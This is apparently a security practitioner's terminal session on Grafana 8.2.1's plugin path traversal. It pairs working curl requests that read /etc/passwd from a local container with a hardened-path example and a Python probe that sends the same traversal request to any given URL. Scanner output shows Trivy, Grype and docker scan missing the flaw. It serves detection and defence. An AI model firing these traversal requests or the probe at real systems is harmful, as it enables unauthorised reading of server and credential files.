This container is vulnerable:
stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
497f2c35813fa2f035252f241e40ef88ad24f458f5989f2e876940b0c00da698
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd | head -3
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1230 100 1230 0 0 400k 0 --:--:-- --:--:-- --:--:-- 400k
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
stefanl@stefanl:~ $
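Why the two requests above reach files outside the plugin directory, as an added illustration that is not Grafana's code: a minimal model of a static-file handler that joins the client-supplied path onto a plugin directory and uses the result as-is, next to a hardened version that canonicalises the path and requires it to stay inside the plugin directory. The directory tree is constructed under a temp dir (the five-level climb to VERSION mirrors the first curl request); the function names and file contents are assumptions of this example.

```python
import os
import tempfile


def unsafe_resolve(plugin_dir, requested):
    """Vulnerable: the client-controlled path is joined onto the plugin dir
    and used as-is. os.path.join keeps every '..' segment (and an absolute
    'requested' replaces plugin_dir entirely), so the result may point at
    anything the server process can read."""
    return os.path.join(plugin_dir, requested)


def safe_resolve(plugin_dir, requested):
    """Hardened: canonicalise first (collapses '..' and follows symlinks),
    then refuse anything whose canonical form is not under plugin_dir.
    commonpath is used instead of a string prefix test so that a sibling
    directory sharing a prefix (plugins/mysql-evil) cannot pass."""
    root = os.path.realpath(plugin_dir)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"{requested!r} escapes {root}")
    return candidate


def escapes(plugin_dir, requested):
    """True when safe_resolve rejects the request."""
    try:
        safe_resolve(plugin_dir, requested)
    except PermissionError:
        return True
    return False


def read_via(resolver, plugin_dir, requested):
    """Read the file a resolver maps the request to (what the handler would serve)."""
    with open(resolver(plugin_dir, requested), encoding="utf-8") as fh:
        return fh.read()


def build_fixture():
    """Constructed tree: <base>/VERSION outside the plugin dir, and one plugin
    dir five levels below it. Contents are placeholders, not real Grafana files."""
    base = tempfile.mkdtemp(prefix="traversal-model-")
    plugin = os.path.join(base, "public", "app", "plugins", "datasource", "mysql")
    os.makedirs(plugin)
    with open(os.path.join(plugin, "module.js"), "w", encoding="utf-8") as fh:
        fh.write("// constructed plugin asset\n")
    with open(os.path.join(base, "VERSION"), "w", encoding="utf-8") as fh:
        fh.write("x.y.z (constructed)\n")
    return base, plugin


if __name__ == "__main__":
    base, plugin = build_fixture()
    climb = "../" * 5 + "VERSION"
    print("unsafe serves:", read_via(unsafe_resolve, plugin, climb).strip())
    print("safe rejects climb:", escapes(plugin, climb))
    print("safe still serves module.js:",
          read_via(safe_resolve, plugin, "module.js").strip())
```

The hardened resolver rejects absolute paths as well as `..` climbs, because `os.path.join` discards the root when the second argument is absolute and the confinement check catches that. Since `realpath` follows symlinks, a symlink inside the plugin directory that points outside it is also refused; that is the behaviour you want for a web root, but it will break a deployment that relies on such symlinks, so test it against the real layout before shipping.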
However, it isn't detected by docker scan (which uses Snyk), Aqua Trivy or Anchore Grype.
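Because the image scanners match on package versions and none of them flag this, the only reliable check is to probe the running instance. The script below is added here and is not part of the original post: it sends the same traversal request the `curl --path-as-is` command sends and looks for /etc/passwd records in the body. Assumptions: the target is reachable at the given URL over HTTP or HTTPS; only `mysql` is confirmed by the transcript above, the other plugin ids are assumed to ship with the image and are tried so that one missing id does not hide the result; a non-200 response is read as "no traversal via that id", which can also just mean the id is not installed.

```python
import http.client
import re
import sys
from urllib.parse import urlsplit

# Plugin ids to try. Only "mysql" is confirmed by the curl above; the rest
# are assumed to be bundled with the image.
PLUGIN_IDS = ("mysql", "prometheus", "graphite", "loki")

# One /etc/passwd record: name:passwd:uid:gid:...
PASSWD_RECORD = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:", re.M)


def traversal_path(plugin_id, depth=8, target="etc/passwd"):
    """Raw request path, byte-for-byte what `curl --path-as-is` sent above."""
    return f"/public/plugins/{plugin_id}/" + "../" * depth + target


def looks_like_passwd(body):
    """True when the body contains at least one passwd-style record."""
    return PASSWD_RECORD.search(body) is not None


def classify(status, body):
    """Verdict for one probe. Reading non-200 as 'no traversal' is an assumption."""
    if status == 200 and looks_like_passwd(body):
        return "vulnerable"
    if status == 200:
        return "inconclusive"  # 200 but not a passwd file; inspect the body
    return "no traversal"      # e.g. 404; may also mean the plugin id is absent


def probe(base_url, plugin_ids=PLUGIN_IDS, timeout=5):
    """Send the traversal request for each plugin id; return {id: (status, verdict)}."""
    u = urlsplit(base_url)
    conn_cls = (http.client.HTTPSConnection if u.scheme == "https"
                else http.client.HTTPConnection)
    results = {}
    for plugin_id in plugin_ids:
        path = traversal_path(plugin_id)
        # http.client writes the request line verbatim: it does not collapse
        # "..", so the server, not the client, decides what the path means.
        # That is the same reason curl needed --path-as-is above.
        conn = conn_cls(u.hostname, u.port, timeout=timeout)
        try:
            conn.request("GET", path)
            resp = conn.getresponse()
            body = resp.read(4096).decode("utf-8", "replace")
            results[plugin_id] = (resp.status, classify(resp.status, body))
        except OSError as exc:
            results[plugin_id] = (None, f"error: {exc}")
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
    for plugin_id, (status, verdict) in probe(target).items():
        print(f"{plugin_id:12} {str(status):5} {verdict}")
```

Run it as `python3 probe.py http://localhost:3000` against the container started above. If you swap in another HTTP client, confirm it does not normalise dot segments before sending; a client that collapses `..` will report "no traversal" against an instance that is in fact exposed, which is exactly the false negative `--path-as-is` avoids.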
stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE
| busybox | CVE-2021-42378 | HIGH | 1.33.1-r3 | 1.33.1-r6 | busybox: use-after-free in |
| | CVE-2021-42379 | | | | busybox: use-after-free in |
| | CVE-2021-42380 | | | | busybox: use-after-free in |
| | CVE-2021-42381 | | | | busybox: use-after-free in |
| | CVE-2021-42382 | | | | busybox: use-after-free in |
| | CVE-2021-42383 | | | | busybox: use-after-free in |
| | CVE-2021-42384 | | | | busybox: use-after-free in |
| | CVE-2021-42385 | | | | busybox: use-after-free in |
| | CVE-2021-42386 | | | | busybox: use-after-free in |
| ssl_client | CVE-2021-42378 | | | | busybox: use-after-free in |
| | CVE-2021-42379 | | | | busybox: use-after-free in |
| | CVE-2021-42380 | | | | busybox: use-after-free in |
| | CVE-2021-42381 | | | | busybox: use-after-free in |
| | CVE-2021-42382 | | | | busybox: use-after-free in |
| | CVE-2021-42383 | | | | busybox: use-after-free in |
| | CVE-2021-42384 | | | | busybox: use-after-free in |
| | CVE-2021-42385 | | | | busybox: use-after-free in |
| | CVE-2021-42386 | | | | busybox: use-after-free in |
stefanl@stefanl:~ $ trivy -v
Version: 0.21.2
Vulnerability DB:
Type: Full
Version: 1
UpdatedAt: 2021-12-13 18:39:56.916824175 +0000 UTC
NextUpdate: 2021-12-14 00:39:56.916823575 +0000 UTC
DownloadedAt: 2021-12-13 20:06:06.505672 +0000 UTC
stefanl@stefanl:~ $
stefanl@stefanl:~ $ grype -q grafana/grafana:8.2.1 |grep -i CVE
busybox 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium
busybox 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High
github.com/google/flatbuffers v1.12.0 CVE-2020-35864 High
github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 CVE-2021-36156 Medium
github.com/prometheus/prometheus v1.8.2-0.20210621150501-ff58416a0b02 CVE-2019-3826 Medium
google.golang.org/protobuf v1.27.1 CVE-2015-5237 High
ssl_client 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium
ssl_client 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High
stefanl@stefanl:~ $
stefanl@stefanl:~ $ grype version
Application: grype
Version: 0.27.0
Syft Version: v0.32.0
BuildDate: 2021-12-08T22:17:50Z
GitCommit: e62186725b8bfe3faddb78fa82b1ca44c747c9b6
GitTreeState: clean
Platform: darwin/amd64
GoVersion: go1.16.10
Compiler: gc
Supported DB Schema: 3
stefanl@stefanl:~ $
stefanl@stefanl:~ $ docker scan --severity medium grafana/grafana:8.2.1
Testing grafana/grafana:8.2.1...
Organization: ---
Package manager: apk
Project name: docker-image|grafana/grafana
Docker image: grafana/grafana:8.2.1
Platform: linux/amd64
Base image: grafana/grafana:8.2.1
Licenses: enabled
✓ Tested 34 dependencies for known issues, no vulnerable paths found.
Base Image Vulnerabilities Severity
grafana/grafana:8.2.1 11 0 critical, 0 high, 0 medium, 11 low
Recommendations for base image upgrade:
Minor upgrades
Base Image Vulnerabilities Severity
grafana/grafana:8.3.2 0 0 critical, 0 high, 0 medium, 0 low
-------------------------------------------------------
Testing grafana/grafana:8.2.1...
Organization: ---
Package manager: gomodules
Target file: /usr/share/grafana/bin/grafana-cli
Project name: github.com/grafana/grafana
Docker image: grafana/grafana:8.2.1
Licenses: enabled
✓ Tested 279 dependencies for known issues, no vulnerable paths found.
-------------------------------------------------------
Testing grafana/grafana:8.2.1...
✗ Medium severity vulnerability found in github.com/cortexproject/cortex/pkg/tenant
Description: Directory Traversal
Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMCORTEXPROJECTCORTEXPKGTENANT-1536565
Introduced through: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf
From: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf
Fixed in: 1.10.0-rc.1
✗ High severity vulnerability found in github.com/ua-parser/uap-go/uaparser
Description: Regular Expression Denial of Service (ReDoS)
Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUAPARSERUAPGOUAPARSER-1569599
Introduced through: github.com/ua-parser/uap-go/uaparser@#daf92ba38329
From: github.com/ua-parser/uap-go/uaparser@#daf92ba38329
✗ High severity vulnerability found in github.com/russellhaering/goxmldsig
Description: Denial of Service (DoS)
Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-608301
Introduced through: github.com/russellhaering/[email protected]
From: github.com/russellhaering/[email protected]
Fixed in: 1.1.1
Organization: ---
Package manager: gomodules
Target file: /usr/share/grafana/bin/grafana-server
Project name: github.com/grafana/grafana
Docker image: grafana/grafana:8.2.1
Licenses: enabled
Tested 614 dependencies for known issues, found 3 issues.
Tested 3 projects, 1 contained vulnerable paths.
stefanl@stefanl:~ $
stefanl@stefanl:~ $ docker scan --version
Version: v0.11.0
Git commit: c8da19f
Provider: Snyk (1.563.0)
stefanl@stefanl:~ $ docker --version
Docker version 20.10.11, build dea9396
stefanl@stefanl:~ $